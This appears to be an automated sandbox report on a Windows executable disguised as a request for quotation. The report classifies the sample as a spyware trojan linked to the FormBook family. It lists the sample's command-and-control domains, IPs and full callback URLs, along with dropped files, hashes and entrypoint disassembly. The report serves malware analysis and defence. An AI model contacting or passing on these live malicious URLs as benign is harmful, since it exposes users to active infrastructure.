            		43.154.104.247
            		truetrue
              		unknown
              www.broomeorchard.xyz
              		15.197.204.56
              		truetrue
                		unknown
                o731lh.vip
                		3.33.130.190
                		truetrue
                  		unknown
                  asociacia.online
                  		81.2.196.19
                  		truetrue
                    		unknown
                    whats-in-the-box.org
                    		3.33.130.190
                    		truetrue
                      		unknown
                      xzwp.g.zxy-cname.com
                      		52.187.43.73
                      		truetrue
                        		unknown
                        www.insicilia.today
                        		52.223.13.41
                        		truetrue
                          		unknown
                          consultarfacil.online
                          		3.33.130.190
                          		truetrue
                            		unknown
                            tempatmudisini01.click
                            		103.21.221.4
                            		truetrue
                              		unknown
                              www.zenscape.top
                              		199.192.21.169
                              		truetrue
                                		unknown
                                hse6978h2.g.asiagoogleantiddoscdn.com
                                		23.224.27.173
                                		truetrue
                                  		unknown
                                  suarahati20.xyz
                                  		198.252.106.191
                                  		truetrue
                                    		unknown
                                    www.93187.xyz
                                    		107.163.130.249
                                    		truetrue
                                      		unknown
                                      www.suarahati20.xyz
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.consultarfacil.online
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.o731lh.vip
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.whats-in-the-box.org
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.asociacia.online
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.52ywq.vip
                                                		unknown
                                                		unknowntrue
                                                  		unknown
                                                  www.tempatmudisini01.click
                                                  		unknown
                                                  		unknowntrue
                                                    		unknown
                                                    www.1183377.app
                                                    		unknown
                                                    		unknowntrue
                                                      		unknown

                                                      Contacted URLs

                                                      NameMaliciousAntivirus DetectionReputation
                                                      http://www.tempatmudisini01.click/abla/true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.nmh6.site/8qne/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.suarahati20.xyz/4est/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.52ywq.vip/4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeX+gm8LhLY0HdzqWbffI0WxOtalbv2UCR6RvwOqtQuPJgvEbTjd3YUbROaC6Ux6KVsboGl1wez7JIRLBvFWiGcrLzlWcfeTA45w8=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqs+EeARQOkoA/Qwpt/BQ4HKq3lGg5eAXthSBpGiRyb49E6pfVOIK8HYayGHDu+DpDN+18WI9ctL3WRi2TK2Q5c=&Vvn=XtJLE6KXyHJ010Ptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.1183377.app/8z5k/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zenscape.top/d8cw/?N0spilI0=ygF20N1+ik7kBOtGb3g4TwN9wkqIIRiR8XEst5j0lvkfFXMCnxh1w4hdkVa8euGiR7K2W9wNoXO2NDH8py5ookWv7InHpo4AkD1QDiauZEraAIYQUMRDKnI=&Vvn=XtJLE6KXyHJ010Ptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.insicilia.today/2fpq/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.broomeorchard.xyz/8o1o/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.consultarfacil.online/2ho9/?N0spilI0=sZDoihg8ajsFNu4rJh4aU/u18lT0jTMSxybOs53co7FoCsqulhCNIl7qmx9+CpDfKiL3BRrx3kpFS5y+tLS3C72rBIAnGZtnn+XzJEmDgEkU4cQofgEFxbM=&Vvn=XtJLE6KXyHJ010Ptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.nmh6.site/8qne/?N0spilI0=KTDLAip6979182Yus4gak8cu0ouPK1SjRu9dlBr1KRF7u6Oe/Vup1PLCUBiG85sopIJcMB3IBfxfJF1E2Fdc2yH6m+FOGHStPZpUzCEofUPNgN9qGZfSYG8=&Vvn=XtJLE6KXyHJ010Ptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.broomeorchard.xyz/8o1o/?N0spilI0=QunhVm6kZFQCJjGjii7PtVl4QBOBSEhunS34CwGNyhG42F+U2Qq2Bbej6HS9mh+MEeKFfLAj85iyVJ5CsJDjW/EB0lpOjo9F2+iOt7QfZRjcLyTCi7EuLmU=&Vvn=XtJLE6KXyHJ010Ptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.93187.xyz/jyeu/?N0spilI0=KiLVsdjbhLGFnrJZtqTZThcLgxZgRsnLJ+iUpFrqUMB7t1Dgy4rxQKgK0ZJ2vypsgoxK5tfcGeo5lfiWWTY36SvGriSEhjCZh1puMp4IzR/yG5rFUDO3WkY=&Vvn=XtJLE6KXyHJ010Ptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.insicilia.today/2fpq/?Vvn=XtJLE6KXyHJ010P&N0spilI0=Kb/tSpzo2Dwy8QCik2PCr8/dlP2bBJ+jv+ep1kI5jCwuscQQek2bWkoiPh5FTvH+ji2zFJaVeezPpoGajJ7KnUaOWGTJ/qpny8WUA+svitDcwEORStRuN1w=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.suarahati20.xyz/4est/?N0spilI0=6TioOITzTznuWaHFY2nP+M5OXgMojRQqdx+6cQbbG9CbTHyFxDml283eSUfpT4rPWLRehJ5KDSFFDUFbTukXgac9EFud27M13v05UDH3lX7bp5CeFPtRd9M=&Vvn=XtJLE6KXyHJ010Ptrue
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.52ywq.vip/4i87/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.o731lh.vip/xweg/?Vvn=XtJLE6KXyHJ010P&N0spilI0=zyGgAOIUWHAkjy5wbuax0/FfUf3h0NwJaxZIhC+JlO6DnbZYVfn3Wlg6Cuq4vonK+0ubeBxTnsDOaX+bBTk8Y+Ai5wuik0xspH+a6MWSZLxuSkFH9/b6rws=true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.o731lh.vip/xweg/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.asociacia.online/jsqu/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.consultarfacil.online/2ho9/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.93187.xyz/jyeu/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.zenscape.top/d8cw/true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.asociacia.online/jsqu/?Vvn=XtJLE6KXyHJ010P&N0spilI0=j6JGavFFAQYaoSsj7sdzjfOI2Rr+bAZS/zrFTn0tpA7YEGIVc6EsUszyewNJDeJ1aRTf+dmReaRifudBLpLuFGiuWviWU248lx4BGGAWHhQeP+58vPv3y+I=true
                                                      • Avira URL Cloud: safe
                                                      		unknown

                                                      URLs from Memory and Binaries

                                                      NameSourceMaliciousAntivirus DetectionReputation
                                                      https://duckduckgo.com/chrome_newtabwrite.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.nmh6.siteTNPukQnytLH.exe, 00000007.00000002.4163624707.0000000004C7B000.00000040.80000000.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/ac/?q=write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://www.google.com/images/branding/product/ico/googleg_lodp.icowrite.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://tempatmudisini01.click/abla/?N0spilI0=R9BPGtjeoV0CDxCGSnwEhbeCoNA2nZVdCqswrite.exe, 00000006.00000002.4162310977.0000000005C52000.00000004.10000000.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.00000000036D2000.00000004.00000001.00040000.00000000.sdmptrue
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://6329.vhjhbv.com/4i87/?Vvn=XtJLE6KXyHJ010P&N0spilI0=tX1gPPm4vGDAfdGczrVeXwrite.exe, 00000006.00000002.4162310977.0000000005478000.00000004.10000000.00040000.00000000.sdmp, TNPukQnytLH.exe, 00000007.00000002.4161791969.0000000002EF8000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.ecosia.org/newtab/write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ac.ecosia.org/autocomplete?q=write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchwrite.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=write.exe, 00000006.00000003.2357840777.0000000007A1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      103.21.221.4
                                                      		tempatmudisini01.clickunknown
                                                      		9905LINKNET-ID-APLinknetASNIDtrue
                                                      199.192.21.169
                                                      		www.zenscape.topUnited States
                                                      		22612NAMECHEAP-NETUStrue
                                                      52.187.43.73
                                                      		xzwp.g.zxy-cname.comUnited States
                                                      		8075MICROSOFT-CORP-MSN-AS-BLOCKUStrue
                                                      107.163.130.249
                                                      		www.93187.xyzUnited States
                                                      		20248TAKE2UStrue
                                                      198.252.106.191
                                                      		suarahati20.xyzCanada
                                                      		20068HAWKHOSTCAtrue
                                                      23.224.27.173
                                                      		hse6978h2.g.asiagoogleantiddoscdn.comUnited States
                                                      		40065CNSERVERSUStrue
                                                      52.223.13.41
                                                      		www.insicilia.todayUnited States
                                                      		8987AMAZONEXPANSIONGBtrue
                                                      43.154.104.247
                                                      		www.nmh6.siteJapan4249LILLY-ASUStrue
                                                      81.2.196.19
                                                      		asociacia.onlineCzech Republic
                                                      		24806INTERNET-CZKtis238403KtisCZtrue
                                                      3.33.130.190
                                                      		o731lh.vipUnited States
                                                      		8987AMAZONEXPANSIONGBtrue
                                                      15.197.204.56
                                                      		www.broomeorchard.xyzUnited States
                                                      		7430TANDEMUStrue

                                                      General Information

                                                      Joe Sandbox version:41.0.0 Charoite
                                                      Analysis ID:1517661
                                                      Start date and time:2024-09-25 05:34:05 +02:00
                                                      Joe Sandbox product:CloudBasic
                                                      Overall analysis duration:0h 10m 28s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:full
                                                      Cookbook file name:default.jbs
                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                      Number of analysed new started processes analysed:8
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:2
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Sample name:RFQ - HTS45785-24-0907I000.exe
                                                      Detection:MAL
                                                      Classification:mal100.troj.spyw.evad.winEXE@7/2@13/11
                                                      EGA Information:
                                                      • Successful, ratio: 75%
                                                      HCA Information:
                                                      • Successful, ratio: 97%
                                                      • Number of executed functions: 54
                                                      • Number of non-executed functions: 300
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .exe
                                                      • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                      • Execution Graph export aborted for target TNPukQnytLH.exe, PID 4324 because it is empty
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                                      • Report size exceeded maximum capacity and may have missing disassembly code.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      23:36:22API Interceptor9378160x Sleep call for process: write.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      103.21.221.4Purchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                      • www.tempatmudisini01.click/phdl/
                                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                      • www.tempatmudisini01.click/lybf/
                                                      SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                      • www.tempatmudisini01.click/r9rj/
                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                      • www.tempatmudisini01.click/abla/
                                                      199.192.21.169Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                      • www.zenscape.top/d8cw/
                                                      DEBIT NOTE 01ST SEP 2024.exeGet hashmaliciousFormBookBrowse
                                                      • www.selftip.top/85su/
                                                      DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                      • www.urbanpulse.help/r50h/
                                                      PROFOMA INVOICE SHEET.exeGet hashmaliciousFormBookBrowse
                                                      • www.selftip.top/85su/
                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                      • www.zenscape.top/d8cw/
                                                      file.exeGet hashmaliciousFormBookBrowse
                                                      • www.urbanpulse.help/r50h/
                                                      INV & BANK DETAILS LETTER.pdf.exeGet hashmaliciousFormBookBrowse
                                                      • www.cenfresh.life/6iok/
                                                      107.163.130.249SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                      • www.93187.xyz/jyeu/
                                                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                      • www.93187.xyz/jd6t/
                                                      198.252.106.191PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                      • www.suarahati20.xyz/tuad/
                                                      PURCHASE ORDER-6350.exeGet hashmaliciousFormBookBrowse
                                                      • www.suarahati20.xyz/tuad/

                                                      Domains

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      www.insicilia.today2nd RFQ TECMARKQATAR PO33218_PDF.exeGet hashmaliciousFormBookBrowse
                                                      • 52.223.13.41
                                                      DCP11-83642024..exeGet hashmaliciousFormBookBrowse
                                                      • 52.223.13.41
                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                      • 52.223.13.41
                                                      SecuriteInfo.com.Win32.Malware-gen.24953.22588.exeGet hashmaliciousFormBookBrowse
                                                      • 52.223.13.41
                                                      file.exeGet hashmaliciousFormBookBrowse
                                                      • 52.223.13.41
                                                      xzwp.g.zxy-cname.comPO-000001488.exeGet hashmaliciousFormBookBrowse
                                                      • 52.187.42.58
                                                      List of Items0001.doc.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 13.76.137.44
                                                      Request for Quotation Hi-Tech Park Project 193200.exeGet hashmaliciousFormBookBrowse
                                                      • 52.230.28.86
                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                      • 13.76.139.81

                                                      ASNs

                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      TAKE2USSOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                      • 107.163.130.249
                                                      New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                      • 107.163.130.249
                                                      Solicitud de Cotizaci#U00f3n #U2013 Cat#U00e1logo de Muestras2024.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 23.231.158.3
                                                      quotation.exeGet hashmaliciousDarkTortilla, FormBookBrowse
                                                      • 23.231.158.3
                                                      #U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 23.231.158.3
                                                      Pro#U015bba o Wycena - Strony 4-6.vbsGet hashmaliciousFormBook, GuLoaderBrowse
                                                      • 23.231.158.3
                                                      Contract.exeGet hashmaliciousFormBookBrowse
                                                      • 23.231.158.3
                                                      SHIPPING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                      • 23.231.158.3
                                                      draft Proforma Invoice.exeGet hashmaliciousFormBookBrowse
                                                      • 23.231.158.3
                                                      SOA.exeGet hashmaliciousFormBookBrowse
                                                      • 23.231.158.3
                                                      LINKNET-ID-APLinknetASNIDPurchase Order_ AEPL-2324-1126.exeGet hashmaliciousFormBookBrowse
                                                      • 103.21.221.4
                                                      jNGMZWmt23.elfGet hashmaliciousMiraiBrowse
                                                      • 139.37.141.74
                                                      ncOLm62YLB.exeGet hashmaliciousFormBookBrowse
                                                      • 103.21.221.4
                                                      SecuriteInfo.com.Win32.Malware-gen.10660.18305.exeGet hashmaliciousFormBookBrowse
                                                      • 103.21.221.4
                                                      SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exeGet hashmaliciousFormBookBrowse
                                                      • 103.21.221.4
                                                      ppc.elfGet hashmaliciousMirai, MoobotBrowse
                                                      • 139.8.6.3
                                                      firmware.armv4l.elfGet hashmaliciousUnknownBrowse
                                                      • 139.40.24.232
                                                      firmware.i686.elfGet hashmaliciousUnknownBrowse
                                                      • 139.255.236.171
                                                      botx.arm.elfGet hashmaliciousMiraiBrowse
                                                      • 139.16.204.145
                                                      botx.mpsl.elfGet hashmaliciousMiraiBrowse
                                                      • 139.44.178.19
                                                      MICROSOFT-CORP-MSN-AS-BLOCKUShttp://updatefacebookmeta.weebly.com/Get hashmaliciousUnknownBrowse
                                                      • 51.104.148.203
                                                      https://att-108291.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 150.171.27.10
                                                      https://009-288-49.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                      • 150.171.27.10
                                                      https://shaw-105922.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                      • 150.171.28.10
                                                      https://att-2024-106815.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                      • 150.171.27.10
                                                      https://shaw-104345.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                      • 150.171.28.10
                                                      https://shaw-103414.weeblysite.com/Get hashmaliciousHTMLPhisherBrowse
                                                      • 150.171.27.10
                                                      https://shaw-104492.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                      • 150.171.28.10
                                                      http://my-site-103283-105983.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                      • 150.171.28.10
                                                      http://vimuscle.vi/css/TB.htmlGet hashmaliciousUnknownBrowse
                                                      • 150.171.28.10
                                                      NAMECHEAP-NETUShttps://lender-abang.pages.dev/Get hashmaliciousUnknownBrowse
                                                      • 162.213.255.57
                                                      https://telegram-message-8n5.pages.dev/Get hashmaliciousUnknownBrowse
                                                      • 162.213.255.57
                                                      https://arabuserseg.net/pp/xzwGet hashmaliciousUnknownBrowse
                                                      • 199.188.205.199
                                                      https://ftyfyu-fae123.ingress-erytho.ewp.live/wp-content/plugins/kolydss/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                      • 63.250.43.132
                                                      https://xmeonaena-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/nwesidem/pages/region.phpGet hashmaliciousUnknownBrowse
                                                      • 63.250.43.5
                                                      https://xmeonaena-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/nwesidem/Get hashmaliciousUnknownBrowse
                                                      • 63.250.43.5
                                                      https://blankonulldry-facc4a.ingress-florina.ewp.live/wp-content/plugins/Suspendisse%20vitae/pages/region.phpGet hashmaliciousUnknownBrowse
                                                      • 63.250.43.136
                                                      https://casacasa-fab1fa.ingress-comporellon.ewp.live/wp-content/plugins/nwesidem/pages/region.php?lcaGet hashmaliciousUnknownBrowse
                                                      • 63.250.43.5
                                                      https://mikaudtazes18-fab2ad.ingress-comporellon.ewp.live/wp-content/plugins/gyokeres23/pages/region.phpGet hashmaliciousUnknownBrowse
                                                      • 63.250.43.6
                                                      https://mikaudtazes18-fab2ad.ingress-comporellon.ewp.live/wp-content/plugins/gyokeres23/Get hashmaliciousUnknownBrowse
                                                      • 63.250.43.5

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Temp\7251G3-6

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\write.exe
                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                      Category:dropped
                                                      Size (bytes):114688
                                                      Entropy (8bit):0.9746603542602881
                                                      Encrypted:false
                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                      Malicious:false
                                                      Reputation:high, very likely benign file
                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\batchers

                                                      Download File
                                                      Process:C:\Users\user\Desktop\RFQ - HTS45785-24-0907I000.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):287744
                                                      Entropy (8bit):7.993452676608905
                                                      Encrypted:true
                                                      SSDEEP:6144:llfSh67Ye/Bktomj1lCv4RDQl58TjG1fKeqghnUwTBVGpLox0+Q2/:vfS4/B09RvWf2wTe8b/
                                                      MD5:3985CA4EE83BDBA8853B1D4D515E850D
                                                      SHA1:DEA7C6DA6980BD6658CB8EC63EB01D4BDE0597E5
                                                      SHA-256:96054FC5FA51168E440AC6C7B788145DCEB2A326B56C8F607A7CEA9A6DCB7EAA
                                                      SHA-512:C6F1424D795904BFE601E4B39E58E074BBF2306AEC32F4F71CF22D97232C37E875530E004F81BF274511040B64A8A2B8D9C21A5E92B1EB93F45A1023E68001A1
                                                      Malicious:false
                                                      Reputation:low
                                                      Preview:t..e.WYN2n.J.....N4..f1>...NZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN2.GRC@E.L9.G.{.X....:*=zE0V)<V7w:/\X(&c,?.0L n^4w..a.*='+t8O3jN7ZWYN2OF[.s:R...).g7>.(..y.=.X...:0.T...n#).g+Z&sW=.YN26GRCN.pB9.O6Z...R6GRCNZ5B.NL6QVRN2dCRCNZ5B9NNGNWYN"6GR3JZ5ByNN'ZWYL26ARCNZ5B9HN7ZWYN267VCNX5B9NN7XW..26WRC^Z5B9^N7JWYN26GBCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWY`FS?&CNZ1.=NN'ZWY.66GBCNZ5B9NN7ZWYN2.GR#NZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCNZ5B9NN7ZWYN26GRCN

                                                      Static File Info

                                                      General

                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Entropy (8bit):7.539586336371795
                                                      TrID:
                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                      • DOS Executable Generic (2002/1) 0.02%
                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                      File name:RFQ - HTS45785-24-0907I000.exe
                                                      File size:1'360'461 bytes
                                                      MD5:8cd57235a1ba838df14c6a67ad2048d0
                                                      SHA1:4fed67f0abcef3c4327774b1d06bf7cf98684db9
                                                      SHA256:b0d625e9b21d2f7373775bfeac6ccf6cf362e24d79a61dd4829a82a1595c27f6
                                                      SHA512:a0cb306340ac8660dc447e8798c03818af8ae1f7cdd7b9d760ad49aae7cbdb2b07da265ee98fd152f1d6625ebb32dff220101c2cf3824aed2d54934f8a4d0be2
                                                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaC3VmKp23kCkug159Avtu9BPXpRCfmGG:7JZoQrbTFZY1iaC4eugD9AOZXLCfmGG
                                                      TLSH:CB55E121F9D68036C2B323B19E7FF769963D79360336D29727C82D215EA05416B2A733
                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..

                                                      File Icon

                                                      Icon Hash:1733312925935517

                                                      Static PE Info

                                                      General

                                                      Entrypoint:0x4165c1
                                                      Entrypoint Section:.text
                                                      Digitally signed:false
                                                      Imagebase:0x400000
                                                      Subsystem:windows gui
                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                      TLS Callbacks:
                                                      CLR (.Net) Version:
                                                      OS Version Major:5
                                                      OS Version Minor:0
                                                      File Version Major:5
                                                      File Version Minor:0
                                                      Subsystem Version Major:5
                                                      Subsystem Version Minor:0
                                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378

                                                      Entrypoint Preview

                                                      Instruction
                                                      call 00007F43CD595D7Bh
                                                      jmp 00007F43CD58CBEEh
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      int3
                                                      push ebp
                                                      mov ebp, esp
                                                      push edi
                                                      push esi
                                                      mov esi, dword ptr [ebp+0Ch]
                                                      mov ecx, dword ptr [ebp+10h]
                                                      mov edi, dword ptr [ebp+08h]
                                                      mov eax, ecx
                                                      mov edx, ecx
                                                      add eax, esi
                                                      cmp edi, esi
                                                      jbe 00007F43CD58CD6Ah
                                                      cmp edi, eax
                                                      jc 00007F43CD58CF06h
                                                      cmp ecx, 00000080h
                                                      jc 00007F43CD58CD7Eh
                                                      cmp dword ptr [004A9724h], 00000000h
                                                      je 00007F43CD58CD75h
                                                      push edi
                                                      push esi
                                                      and edi, 0Fh
                                                      and esi, 0Fh
                                                      cmp edi, esi
                                                      pop esi
                                                      pop edi
                                                      jne 00007F43CD58CD67h
                                                      jmp 00007F43CD58D142h
                                                      test edi, 00000003h
                                                      jne 00007F43CD58CD76h
                                                      shr ecx, 02h
                                                      and edx, 03h
                                                      cmp ecx, 08h
                                                      jc 00007F43CD58CD8Bh
                                                      rep movsd
                                                      jmp dword ptr [00416740h+edx*4]
                                                      mov eax, edi
                                                      mov edx, 00000003h
                                                      sub ecx, 04h
                                                      jc 00007F43CD58CD6Eh
                                                      and eax, 03h
                                                      add ecx, eax
